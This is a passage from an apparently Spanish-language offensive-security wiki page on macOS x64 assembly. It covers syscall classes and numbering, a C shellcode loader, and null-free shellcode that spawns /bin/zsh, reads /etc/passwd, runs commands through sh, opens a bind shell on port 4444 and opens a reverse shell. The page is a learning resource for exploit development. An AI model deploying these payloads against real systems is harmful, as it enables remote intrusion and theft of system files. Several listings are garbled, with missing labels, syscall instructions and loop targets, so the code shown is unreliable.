` es el número de bytes necesario)
### **Epílogo de Función**
1. **Mover el puntero base actual al puntero de pila**: `mov rsp, rbp` (desasignar variables locales)
2. **Sacar el antiguo puntero base de la pila**: `pop rbp` (restaura el puntero base del llamante)
3. **Retornar**: `ret` (devuelve el control al llamante)
## macOS
### syscalls
Existen diferentes clases de syscalls, puedes [**encontrarlas aquí**](https://opensource.apple.com/source/xnu/xnu-1504.3.12/osfmk/mach/i386/syscall\_sw.h)**:**
#define SYSCALL_CLASS_NONE 0 /* Invalid */
#define SYSCALL_CLASS_MACH 1 /* Mach */
#define SYSCALL_CLASS_UNIX 2 /* Unix/BSD */
#define SYSCALL_CLASS_MDEP 3 /* Machine-dependent */
#define SYSCALL_CLASS_DIAG 4 /* Diagnostics */
#define SYSCALL_CLASS_IPC 5 /* Mach IPC */
Luego, puedes encontrar cada número de llamada al sistema [**en esta URL**](https://opensource.apple.com/source/xnu/xnu-1504.3.12/bsd/kern/syscalls.master)**:**
0 AUE_NULL ALL { int nosys(void); } { indirect syscall }
1 AUE_EXIT ALL { void exit(int rval); }
2 AUE_FORK ALL { int fork(void); }
3 AUE_NULL ALL { user_ssize_t read(int fd, user_addr_t cbuf, user_size_t nbyte); }
4 AUE_NULL ALL { user_ssize_t write(int fd, user_addr_t cbuf, user_size_t nbyte); }
5 AUE_OPEN_RWTC ALL { int open(user_addr_t path, int flags, int mode); }
6 AUE_CLOSE ALL { int close(int fd); }
7 AUE_WAIT4 ALL { int wait4(int pid, user_addr_t status, int options, user_addr_t rusage); }
8 AUE_NULL ALL { int nosys(void); } { old creat }
9 AUE_LINK ALL { int link(user_addr_t path, user_addr_t link); }
10 AUE_UNLINK ALL { int unlink(user_addr_t path); }
11 AUE_NULL ALL { int nosys(void); } { old execv }
12 AUE_CHDIR ALL { int chdir(user_addr_t path); }
Entonces, para llamar a la llamada del sistema `open` (**5**) desde la clase **Unix/BSD**, necesitas sumarle: `0x2000000`
Por lo tanto, el número de llamada del sistema para llamar a open sería `0x2000005`
### Códigos de Shell
Para compilar:
{% code overflow="wrap" %}
nasm -f macho64 shell.asm -o shell.o
ld -o shell shell.o -macosx_version_min 13.0 -lSystem -L /Library/Developer/CommandLineTools/SDKs/MacOSX.sdk/usr/lib
{% endcode %}
Para extraer los bytes:
{% code overflow="wrap" %}
# Code from https://github.com/daem0nc0re/macOS_ARM64_Shellcode/blob/master/helper/extract.sh
for c in $(objdump -d "shell.o" | grep -E '[0-9a-f]+:' | cut -f 1 | cut -d : -f 2) ; do
echo -n '\\x'$c
# Another option
otool -t shell.o | grep 00 | cut -f2 -d$'\t' | sed 's/ /\\x/g' | sed 's/^/\\x/g' | sed 's/\\x$//g'
{% endcode %}
Código C para probar el shellcode
\`\`\`c // code from https://github.com/daem0nc0re/macOS\_ARM64\_Shellcode/blob/master/helper/loader.c // gcc loader.c -o loader #include #include #include #include
int (\*sc)();
char shellcode\[] = "";
int main(int argc, char \*\*argv) { printf("\[>] Shellcode Length: %zd Bytes\n", strlen(shellcode));
void \*ptr = mmap(0, 0x1000, PROT\_WRITE | PROT\_READ, MAP\_ANON | MAP\_PRIVATE | MAP\_JIT, -1, 0);
if (ptr == MAP\_FAILED) { perror("mmap"); exit(-1); } printf("\[+] SUCCESS: mmap\n"); printf(" |-> Return = %p\n", ptr);
void \*dst = memcpy(ptr, shellcode, sizeof(shellcode)); printf("\[+] SUCCESS: memcpy\n"); printf(" |-> Return = %p\n", dst);
int status = mprotect(ptr, 0x1000, PROT\_EXEC | PROT\_READ);
if (status == -1) { perror("mprotect"); exit(-1); } printf("\[+] SUCCESS: mprotect\n"); printf(" |-> Return = %d\n", status);
printf("\[>] Trying to execute shellcode...\n");
sc = ptr; sc();
return 0; }
#### Shell
Tomado de [**aquí**](https://github.com/daem0nc0re/macOS\_ARM64\_Shellcode/blob/master/shell.s) y explicado.
bits 64
global _main
call r_cmd64
db '/bin/zsh', 0
r_cmd64: ; the call placed a pointer to db (argv[2])
pop rdi ; arg1 from the stack placed by the call to l_cmd64
xor rdx, rdx ; store null arg3
push 59 ; put 59 on the stack (execve syscall)
pop rax ; pop it to RAX
bts rax, 25 ; set the 25th bit to 1 (to add 0x2000000 without using null bytes)
\`\`\`armasm bits 64 global \_main
\_main: xor rdx, rdx ; zero our RDX push rdx ; push NULL string terminator mov rbx, '/bin/zsh' ; move the path into RBX push rbx ; push the path, to the stack mov rdi, rsp ; store the stack pointer in RDI (arg1) push 59 ; put 59 on the stack (execve syscall) pop rax ; pop it to RAX bts rax, 25 ; set the 25th bit to 1 (to add 0x2000000 without using null bytes) syscall
#### Leer con cat
El objetivo es ejecutar `execve("/bin/cat", ["/bin/cat", "/etc/passwd"], NULL)`, por lo que el segundo argumento (x1) es un array de parámetros (lo que en memoria significa una pila de direcciones).
bits 64
section .text
global _main
; Prepare the arguments for the execve syscall
sub rsp, 40 ; Allocate space on the stack similar to `sub sp, sp, #48`
lea rdi, [rel cat_path] ; rdi will hold the address of "/bin/cat"
lea rsi, [rel passwd_path] ; rsi will hold the address of "/etc/passwd"
; Create inside the stack the array of args: ["/bin/cat", "/etc/passwd"]
push rsi ; Add "/etc/passwd" to the stack (arg0)
push rdi ; Add "/bin/cat" to the stack (arg1)
; Set in the 2nd argument of exec the addr of the array
mov rsi, rsp ; argv=rsp - store RSP's value in RSI
xor rdx, rdx ; Clear rdx to hold NULL (no environment variables)
push 59 ; put 59 on the stack (execve syscall)
pop rax ; pop it to RAX
bts rax, 25 ; set the 25th bit to 1 (to add 0x2000000 without using null bytes)
syscall ; Make the syscall
section .data
cat_path: db "/bin/cat", 0
passwd_path: db "/etc/passwd", 0
**Invocar comando con sh**
bits 64
section .text
global _main
; Prepare the arguments for the execve syscall
sub rsp, 32 ; Create space on the stack
; Argument array
lea rdi, [rel touch_command]
push rdi ; push &"touch /tmp/lalala"
lea rdi, [rel sh_c_option]
push rdi ; push &"-c"
lea rdi, [rel sh_path]
push rdi ; push &"/bin/sh"
; execve syscall
mov rsi, rsp ; rsi = pointer to argument array
xor rdx, rdx ; rdx = NULL (no env variables)
push 59 ; put 59 on the stack (execve syscall)
pop rax ; pop it to RAX
bts rax, 25 ; set the 25th bit to 1 (to add 0x2000000 without using null bytes)
xor rdi, rdi ; Exit status code 0
push 1 ; put 1 on the stack (exit syscall)
pop rax ; pop it to RAX
bts rax, 25 ; set the 25th bit to 1 (to add 0x2000000 without using null bytes)
section .data
sh_path: db "/bin/sh", 0
sh_c_option: db "-c", 0
touch_command: db "touch /tmp/lalala", 0
**Shell de conexión**
Shell de conexión desde [https://packetstormsecurity.com/files/151731/macOS-TCP-4444-Bind-Shell-Null-Free-Shellcode.html](https://packetstormsecurity.com/files/151731/macOS-TCP-4444-Bind-Shell-Null-Free-Shellcode.html) en el **puerto 4444**
section .text
global _main
xor rdi, rdi
mul rdi
mov dil, 0x2
xor rsi, rsi
mov sil, 0x1
mov al, 0x2
ror rax, 0x28
mov r8, rax
mov al, 0x61
; struct sockaddr_in {
; __uint8_t sin_len;
; sa_family_t sin_family;
; in_port_t sin_port;
; struct in_addr sin_addr;
; char sin_zero[8];
; };
mov rsi, 0xffffffffa3eefdf0
neg rsi
push rsi
push rsp
pop rsi
; bind(host_sockid, &sockaddr, 16)
mov rdi, rax
xor dl, 0x10
mov rax, r8
mov al, 0x68
; listen(host_sockid, 2)
xor rsi, rsi
mov sil, 0x2
mov rax, r8
mov al, 0x6a
; accept(host_sockid, 0, 0)
xor rsi, rsi
xor rdx, rdx
mov rax, r8
mov al, 0x1e
mov rdi, rax
mov sil, 0x3
; dup2(client_sockid, 2)
; -> dup2(client_sockid, 1)
; -> dup2(client_sockid, 0)
mov rax, r8
mov al, 0x5a
sub sil, 1
test rsi, rsi
jne dup2
; execve("//bin/sh", 0, 0)
push rsi
mov rdi, 0x68732f6e69622f2f
push rdi
push rsp
pop rdi
mov rax, r8
mov al, 0x3b
**Shell Inverso**
Shell inverso desde [https://packetstormsecurity.com/files/151727/macOS-](https://packetstormsecurity.com/files/151727/macOS- Shell inverso a ****
section .text
global _main
xor rdi, rdi
mul rdi
mov dil, 0x2
xor rsi, rsi
mov sil, 0x1
mov al, 0x2
ror rax, 0x28
mov r8, rax
mov al, 0x61
; struct sockaddr_in {
; __uint8_t sin_len;
; sa_family_t sin_family;
; in_port_t sin_port;
; struct in_addr sin_addr;
; char sin_zero[8];
; };
mov rsi, 0xfeffff80a3eefdf0
neg rsi
push rsi
push rsp
pop rsi
; connect(sockid, &sockaddr, 16)
mov rdi, rax
xor dl, 0x10
mov rax, r8
mov al, 0x62
xor rsi, rsi
mov sil, 0x3
; dup2(sockid, 2)
; -> dup2(sockid, 1)
; -> dup2(sockid, 0)
mov rax, r8
mov al, 0x5a
sub sil, 1
test rsi, rsi
jne dup2
; execve("//bin/sh", 0, 0)
push rsi
mov rdi, 0x68732f6e69622f2f
push rdi
push rsp
pop rdi
xor rdx, rdx
mov rax, r8
mov al, 0x3b